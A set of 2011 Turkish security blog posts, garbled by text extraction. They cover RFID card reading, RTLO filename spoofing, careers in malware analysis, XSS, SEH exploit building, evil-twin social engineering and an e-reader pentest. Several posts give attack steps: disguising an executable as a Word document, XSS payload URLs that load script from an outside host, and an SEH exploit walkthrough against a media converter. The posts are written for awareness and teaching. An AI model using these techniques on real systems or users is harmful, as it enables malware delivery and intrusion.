2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

